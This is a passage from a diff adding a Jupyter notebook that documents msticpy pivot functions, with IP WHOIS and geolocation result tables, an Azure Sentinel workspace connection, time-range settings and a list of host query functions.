+       "      <td>65.55.44.108</td>\n",
+       "      <td>[{'cidr': '65.52.0.0/14', 'name': 'MICROSOFT-1BLK', 'handle': 'NET-65-52-0-0-1', 'range': '65.52...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>14</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>3598</td>\n",
+       "      <td>131.107.0.0/16</td>\n",
+       "      <td>US</td>\n",
+       "      <td>1988-11-11</td>\n",
+       "      <td>MICROSOFT-CORP-AS, US</td>\n",
+       "      <td>131.107.147.209</td>\n",
+       "      <td>[{'cidr': '131.107.0.0/16', 'name': 'MICROSOFT', 'handle': 'NET-131-107-0-0-1', 'range': '131.10...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>15</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>16</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>17</th>\n",
+       "      <td>NaN</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>8075</td>\n",
+       "      <td>13.64.0.0/11</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2015-03-26</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>13.82.152.48</td>\n",
+       "      <td>[{'cidr': '13.64.0.0/11, 13.104.0.0/14, 13.96.0.0/13', 'name': 'MSFT', 'handle': 'NET-13-64-0-0-...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "    nir asn_registry    asn         asn_cidr asn_country_code    asn_date  \\\n",
+       "9   NaN         arin  15169  172.217.15.0/24               US  2012-04-16   \n",
+       "10  NaN         arin   8075     40.80.0.0/12               US  2015-02-23   \n",
+       "11  NaN         arin   8075     20.36.0.0/14               US  2017-10-18   \n",
+       "12  NaN         arin   8075     23.96.0.0/14               US  2013-06-18   \n",
+       "13  NaN         arin   8075     65.52.0.0/14               US  2001-02-14   \n",
+       "14  NaN         arin   3598   131.107.0.0/16               US  1988-11-11   \n",
+       "15  NaN          NaN    NaN              NaN              NaN         NaN   \n",
+       "16  NaN          NaN    NaN              NaN              NaN         NaN   \n",
+       "17  NaN         arin   8075     13.64.0.0/11               US  2015-03-26   \n",
+       "\n",
+       "                    asn_description            query  \\\n",
+       "9                        GOOGLE, US    172.217.15.99   \n",
+       "10  MICROSOFT-CORP-MSN-AS-BLOCK, US     40.85.232.64   \n",
+       "11  MICROSOFT-CORP-MSN-AS-BLOCK, US     20.38.98.100   \n",
+       "12  MICROSOFT-CORP-MSN-AS-BLOCK, US      23.96.64.84   \n",
+       "13  MICROSOFT-CORP-MSN-AS-BLOCK, US     65.55.44.108   \n",
+       "14            MICROSOFT-CORP-AS, US  131.107.147.209   \n",
+       "15                              NaN              NaN   \n",
+       "16                              NaN              NaN   \n",
+       "17  MICROSOFT-CORP-MSN-AS-BLOCK, US     13.82.152.48   \n",
+       "\n",
+       "                                                                                                   nets  \\\n",
+       "9   [{'cidr': '172.217.0.0/16', 'name': 'GOOGLE', 'handle': 'NET-172-217-0-0-1', 'range': '172.217.0...   \n",
+       "10  [{'cidr': '40.120.0.0/14, 40.96.0.0/12, 40.112.0.0/13, 40.124.0.0/16, 40.74.0.0/15, 40.125.0.0/1...   \n",
+       "11  [{'cidr': '20.34.0.0/15, 20.33.0.0/16, 20.128.0.0/16, 20.36.0.0/14, 20.64.0.0/10, 20.48.0.0/12, ...   \n",
+       "12  [{'cidr': '23.96.0.0/13', 'name': 'MSFT', 'handle': 'NET-23-96-0-0-1', 'range': '23.96.0.0 - 23....   \n",
+       "13  [{'cidr': '65.52.0.0/14', 'name': 'MICROSOFT-1BLK', 'handle': 'NET-65-52-0-0-1', 'range': '65.52...   \n",
+       "14  [{'cidr': '131.107.0.0/16', 'name': 'MICROSOFT', 'handle': 'NET-131-107-0-0-1', 'range': '131.10...   \n",
+       "15                                                                                                  NaN   \n",
+       "16                                                                                                  NaN   \n",
+       "17  [{'cidr': '13.64.0.0/11, 13.104.0.0/14, 13.96.0.0/13', 'name': 'MSFT', 'handle': 'NET-13-64-0-0-...   \n",
+       "\n",
+       "    raw  referral  raw_referral  \n",
+       "9   NaN       NaN           NaN  \n",
+       "10  NaN       NaN           NaN  \n",
+       "11  NaN       NaN           NaN  \n",
+       "12  NaN       NaN           NaN  \n",
+       "13  NaN       NaN           NaN  \n",
+       "14  NaN       NaN           NaN  \n",
+       "15  NaN       NaN           NaN  \n",
+       "16  NaN       NaN           NaN  \n",
+       "17  NaN       NaN           NaN  "
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>CountryCode</th>\n",
+       "      <th>CountryName</th>\n",
+       "      <th>State</th>\n",
+       "      <th>City</th>\n",
+       "      <th>Longitude</th>\n",
+       "      <th>Latitude</th>\n",
+       "      <th>Asn</th>\n",
+       "      <th>edges</th>\n",
+       "      <th>Type</th>\n",
+       "      <th>AdditionalData</th>\n",
+       "      <th>IpAddress</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>-97.8220</td>\n",
+       "      <td>37.7510</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>172.217.15.99</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>CA</td>\n",
+       "      <td>Canada</td>\n",
+       "      <td>Ontario</td>\n",
+       "      <td>Toronto</td>\n",
+       "      <td>-79.4195</td>\n",
+       "      <td>43.6644</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>40.85.232.64</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>-78.1539</td>\n",
+       "      <td>38.7095</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>20.38.98.100</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>-78.1539</td>\n",
+       "      <td>38.7095</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>23.96.64.84</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Boydton</td>\n",
+       "      <td>-78.3750</td>\n",
+       "      <td>36.6534</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>65.55.44.108</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>Redmond</td>\n",
+       "      <td>-122.1257</td>\n",
+       "      <td>47.6722</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>131.107.147.209</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>6</th>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>-78.1539</td>\n",
+       "      <td>38.7095</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>13.82.152.48</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "  CountryCode    CountryName       State        City  Longitude  Latitude  \\\n",
+       "0          US  United States        None        None   -97.8220   37.7510   \n",
+       "1          CA         Canada     Ontario     Toronto   -79.4195   43.6644   \n",
+       "2          US  United States    Virginia  Washington   -78.1539   38.7095   \n",
+       "3          US  United States    Virginia  Washington   -78.1539   38.7095   \n",
+       "4          US  United States    Virginia     Boydton   -78.3750   36.6534   \n",
+       "5          US  United States  Washington     Redmond  -122.1257   47.6722   \n",
+       "6          US  United States    Virginia  Washington   -78.1539   38.7095   \n",
+       "\n",
+       "    Asn edges         Type AdditionalData        IpAddress  \n",
+       "0  None    {}  geolocation             {}    172.217.15.99  \n",
+       "1  None    {}  geolocation             {}     40.85.232.64  \n",
+       "2  None    {}  geolocation             {}     20.38.98.100  \n",
+       "3  None    {}  geolocation             {}      23.96.64.84  \n",
+       "4  None    {}  geolocation             {}     65.55.44.108  \n",
+       "5  None    {}  geolocation             {}  131.107.147.209  \n",
+       "6  None    {}  geolocation             {}     13.82.152.48  "
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "display(IpAddress.util.ip_type(data=ip_df1, input_col=\"AllExtIPs\"))\n",
+    "display(IpAddress.util.ip_type(data=ip_df1, ip=\"AllExtIPs\"))\n",
+    "display(IpAddress.util.whois(data=ip_df1, column=\"AllExtIPs\"))\n",
+    "display(IpAddress.util.geoloc(data=ip_df1, src_col=\"AllExtIPs\"))"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Joining input to output data\n",
+    "\n",
+    "You might want to return a data set that is joined to your input set.\n",
+    "To do that use the \"join\" parameter.\n",
+    "\n",
+    "The value of join can be:\n",
+    "- inner\n",
+    "- left\n",
+    "- right\n",
+    "- outer\n",
+    "\n",
+    "To preserve all rows from the input, use a \"left\" join.\n",
+    "To keep only rows that have a valid result from the function use \"inner\" or \"right\"\n",
+    "\n",
+    "> Note while most functions only return a single output row for each input row<br>\n",
+    "> some return multiple rows. Be cautious using \"outer\" in these cases."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 19,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>AllExtIPs</th>\n",
+       "      <th>CountryCode</th>\n",
+       "      <th>CountryName</th>\n",
+       "      <th>State</th>\n",
+       "      <th>City</th>\n",
+       "      <th>Longitude</th>\n",
+       "      <th>Latitude</th>\n",
+       "      <th>Asn</th>\n",
+       "      <th>edges</th>\n",
+       "      <th>Type</th>\n",
+       "      <th>AdditionalData</th>\n",
+       "      <th>IpAddress</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>172.217.15.99</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>-97.8220</td>\n",
+       "      <td>37.7510</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>172.217.15.99</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>40.85.232.64</td>\n",
+       "      <td>CA</td>\n",
+       "      <td>Canada</td>\n",
+       "      <td>Ontario</td>\n",
+       "      <td>Toronto</td>\n",
+       "      <td>-79.4195</td>\n",
+       "      <td>43.6644</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>40.85.232.64</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>20.38.98.100</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>-78.1539</td>\n",
+       "      <td>38.7095</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>20.38.98.100</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>23.96.64.84</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>-78.1539</td>\n",
+       "      <td>38.7095</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>23.96.64.84</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>65.55.44.108</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Boydton</td>\n",
+       "      <td>-78.3750</td>\n",
+       "      <td>36.6534</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>65.55.44.108</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>131.107.147.209</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>Redmond</td>\n",
+       "      <td>-122.1257</td>\n",
+       "      <td>47.6722</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>131.107.147.209</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>6</th>\n",
+       "      <td>10.0.3.4</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7</th>\n",
+       "      <td>10.0.3.5</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>8</th>\n",
+       "      <td>13.82.152.48</td>\n",
+       "      <td>US</td>\n",
+       "      <td>United States</td>\n",
+       "      <td>Virginia</td>\n",
+       "      <td>Washington</td>\n",
+       "      <td>-78.1539</td>\n",
+       "      <td>38.7095</td>\n",
+       "      <td>None</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>geolocation</td>\n",
+       "      <td>{}</td>\n",
+       "      <td>13.82.152.48</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "         AllExtIPs CountryCode    CountryName       State        City  \\\n",
+       "0    172.217.15.99          US  United States        None        None   \n",
+       "1     40.85.232.64          CA         Canada     Ontario     Toronto   \n",
+       "2     20.38.98.100          US  United States    Virginia  Washington   \n",
+       "3      23.96.64.84          US  United States    Virginia  Washington   \n",
+       "4     65.55.44.108          US  United States    Virginia     Boydton   \n",
+       "5  131.107.147.209          US  United States  Washington     Redmond   \n",
+       "6         10.0.3.4         NaN            NaN         NaN         NaN   \n",
+       "7         10.0.3.5         NaN            NaN         NaN         NaN   \n",
+       "8     13.82.152.48          US  United States    Virginia  Washington   \n",
+       "\n",
+       "   Longitude  Latitude   Asn edges         Type AdditionalData  \\\n",
+       "0   -97.8220   37.7510  None    {}  geolocation             {}   \n",
+       "1   -79.4195   43.6644  None    {}  geolocation             {}   \n",
+       "2   -78.1539   38.7095  None    {}  geolocation             {}   \n",
+       "3   -78.1539   38.7095  None    {}  geolocation             {}   \n",
+       "4   -78.3750   36.6534  None    {}  geolocation             {}   \n",
+       "5  -122.1257   47.6722  None    {}  geolocation             {}   \n",
+       "6        NaN       NaN   NaN   NaN          NaN            NaN   \n",
+       "7        NaN       NaN   NaN   NaN          NaN            NaN   \n",
+       "8   -78.1539   38.7095  None    {}  geolocation             {}   \n",
+       "\n",
+       "         IpAddress  \n",
+       "0    172.217.15.99  \n",
+       "1     40.85.232.64  \n",
+       "2     20.38.98.100  \n",
+       "3      23.96.64.84  \n",
+       "4     65.55.44.108  \n",
+       "5  131.107.147.209  \n",
+       "6              NaN  \n",
+       "7              NaN  \n",
+       "8     13.82.152.48  "
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "display(IpAddress.util.geoloc(data=ip_df1, src_col=\"AllExtIPs\", join=\"left\"))"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## DataQuery Pivot functions\n",
+    "\n",
+    "A significant difference between the functions that we've seen so far\n",
+    "and data query functions is that the latter **do not accept generic parameter names.**\n",
+    "\n",
+    "When you use a named parameter in a data query pivot, you must specify\n",
+    "the name that the query function is expecting. If in doubt, use \"?\" prefix to show the function help.\n",
+    "\n",
+    "Example:\n",
+    "```\n",
+    "    Host.AzureSentinel.list_host_events_by_id?\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 20,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<!DOCTYPE html>\n",
+       "            <html><body>\n",
+       "            <div style=''>\n",
+       "            \n",
+       "            <button onclick=\"this.style.visibility='visible';\n",
+       "            kql_MagicLaunchWindowFunction('kqlmagic/temp_files/fa0c3b7c-13d3-4180-8609-49af15e5a34a/_8ecf8077-cf51-4820-aadd-14040956f35d_at_loganalytics_schema.html', 'fullscreen=no,directories=no,location=no,menubar=no,resizable=yes,scrollbars=yes,status=no,titlebar=no,toolbar=no,', '_8ecf8077_cf51_4820_aadd_14040956f35d_at_loganalytics_schema', '');\n",
+       "            kql_MagicCloseWindow(kql_Magic__8ecf8077_cf51_4820_aadd_14040956f35d_at_loganalytics_schema, -1, -1);\">\n",
+       "            popup schema 8ecf8077-cf51-4820-aadd-14040956f35d@loganalytics</button>\n",
+       "            </div>\n",
+       "\n",
+       "            <script>\n",
+       "            var kql_Magic__8ecf8077_cf51_4820_aadd_14040956f35d_at_loganalytics_schema = null;\n",
+       "\n",
+       "\n",
+       "            function kql_MagicCloseWindow(window_obj, obj_secs, itself_secs) {\n",
+       "                if (obj_secs >= 0) {\n",
+       "                    _timeout = setTimeout(function(){\n",
+       "                        window_obj.close();\n",
+       "                        if (itself_secs >= 0) {\n",
+       "                            __timeout = setTimeout(function(){window.close();}, itself_secs * 1000);\n",
+       "                        }\n",
+       "                    }, obj_secs * 1000);\n",
+       "                } else if (itself_secs >= 0) {\n",
+       "                    _timeout = setTimeout(function(){window.close();}, itself_secs * 1000);\n",
+       "                }\n",
+       "            }\n",
+       "\n",
+       "            function kql_MagicLaunchWindowFunction(file_path, window_params, window_name, host_or_text) {\n",
+       "                var url;\n",
+       "                if (host_or_text == 'text') {\n",
+       "                    url = ''\n",
+       "                } else if (file_path.startsWith('http')) {\n",
+       "                    url = file_path;\n",
+       "                } else {\n",
+       "                    var base_url = '';\n",
+       "\n",
+       "                    // check if azure notebook\n",
+       "                    var azure_host = (host_or_text == null || host_or_text.length == 0) ? 'https://notebooks.azure.com' : host_or_text;\n",
+       "                    var start = azure_host.search('//');\n",
+       "                    var azure_host_suffix = '.' + azure_host.substring(start+2);\n",
+       "\n",
+       "                    var loc = String(window.location);\n",
+       "                    var end = loc.search(azure_host_suffix);\n",
+       "                    start = loc.search('//');\n",
+       "                    if (start > 0 && end > 0) {\n",
+       "                        var parts = loc.substring(start+2, end).split('-');\n",
+       "                        if (parts.length == 2) {\n",
+       "                            var library = parts[0];\n",
+       "                            var user = parts[1];\n",
+       "                            base_url = azure_host + '/api/user/' +user+ '/library/' +library+ '/html/';\n",
+       "                        }\n",
+       "                    }\n",
+       "\n",
+       "                    // check if local jupyter lab\n",
+       "                    if (base_url.length == 0) {\n",
+       "                        var configDataScipt  = document.getElementById('jupyter-config-data');\n",
+       "                        if (configDataScipt != null) {\n",
+       "                            var jupyterConfigData = JSON.parse(configDataScipt.textContent);\n",
+       "                            if (jupyterConfigData['appName'] == 'JupyterLab' && jupyterConfigData['serverRoot'] != null &&  jupyterConfigData['treeUrl'] != null) {\n",
+       "                                var basePath = 'e:/src/microsoft/msticpy/docs/notebooks' + '/';\n",
+       "                                if (basePath.startsWith(jupyterConfigData['serverRoot'])) {\n",
+       "                                    base_url = '/files/' + basePath.substring(jupyterConfigData['serverRoot'].length+1);\n",
+       "                                }\n",
+       "                            }\n",
+       "                        }\n",
+       "                    }\n",
+       "\n",
+       "                    // assume local jupyter notebook\n",
+       "                    if (base_url.length == 0) {\n",
+       "\n",
+       "                        var parts = loc.split('/');\n",
+       "                        parts.pop();\n",
+       "                        base_url = parts.join('/') + '/';\n",
+       "                    }\n",
+       "                    url = base_url + file_path;\n",
+       "                }\n",
+       "\n",
+       "                window.focus();\n",
+       "                var w = screen.width / 2;\n",
+       "                var h = screen.height / 2;\n",
+       "                params = 'width='+w+',height='+h;\n",
+       "                // kql_Magic + window_name should be a global variable \n",
+       "                window_obj = window.open(url, window_name, window_params + params);\n",
+       "                if (url == '') {\n",
+       "                    var el = window_obj.document.createElement('p');\n",
+       "                    window_obj.document.body.overflow = 'auto';\n",
+       "                    el.style.top = 0;\n",
+       "                    el.style.left = 0;\n",
+       "                    el.innerHTML = file_path;\n",
+       "                    window_obj.document.body.appendChild(el);\n",
+       "                }\n",
+       "                kql_Magic__8ecf8077_cf51_4820_aadd_14040956f35d_at_loganalytics_schema = window_obj;\n",
+       "            }\n",
+       "            </script>\n",
+       "\n",
+       "            </body></html>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "ws = WorkspaceConfig(workspace=\"CyberSecuritySoc\")\n",
+    "az_provider.connect(ws.code_connect_str)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Setting time parameters for queries interactively\n",
+    "\n",
+    "Use the `edit_query_time` function to set/change the time range used by queries.\n",
+    "\n",
+    "With no parameters it defaults to a period of \\[*UtcNow - 1 day*\\] to \\[*UtcNow*\\].\n",
+    "\n",
+    "Or you can specify a timespan to use with the TimeSpan class."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 21,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Help on function edit_query_time in module msticpy.datamodel.pivot:\n",
+      "\n",
+      "edit_query_time(self, timespan: Union[msticpy.common.timespan.TimeSpan, NoneType] = None)\n",
+      "    Display a QueryTime widget to get the timespan.\n",
+      "    \n",
+      "    Parameters\n",
+      "    ----------\n",
+      "    timespan : Optional[TimeSpan], optional\n",
+      "        Pre-populate the timespan shown by the QueryTime editor,\n",
+      "        by default None\n",
+      "\n"
+     ]
+    }
+   ],
+   "source": [
+    "help(Pivot.edit_query_time)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 22,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "d87743650b6c4e30a1856fd2822e82a6",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(HTML(value='<h4>Set time range for pivot functions.</h4>'), HBox(children=(DatePicker(value=dat…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "from msticpy.common.timespan import TimeSpan\n",
+    "ts = TimeSpan(start=\"2020-10-01\", period=\"1d\")\n",
+    "Pivot.current.edit_query_time(timespan=ts)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Setting the timespan programmatically\n",
+    "You can also just set the timespan directly on the pivot object"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 23,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "Pivot.current.timespan = ts"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### What queries do we have?"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 24,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "list_related_alerts function\n",
+      "az_net_analytics function\n",
+      "get_info_by_hostname function\n",
+      "auditd_all function\n",
+      "sudo_activity function\n",
+      "cron_activity function\n",
+      "user_group_activity function\n",
+      "all_syslog function\n",
+      "squid_activity function\n",
+      "user_logon function\n",
+      "list_logons_for_host function\n",
+      "list_host_logon_failures function\n",
+      "get_ips_for_host function\n",
+      "get_heartbeat_for_host function\n",
+      "list_azure_network_flows_by_host function\n",
+      "list_host_events function\n",
+      "list_host_events_by_id function\n",
+      "list_other_events function\n",
+      "get_host_logon function\n",
+      "list_host_logons function\n",
+      "list_all_logons_by_host function\n",
+      "list_host_processes function\n",
+      "get_process_tree function\n",
+      "get_parent_process function\n",
+      "list_processes_in_session function\n"
+     ]
+    }
+   ],
+   "source": [
+    "Host.AzureSentinel()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 25,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
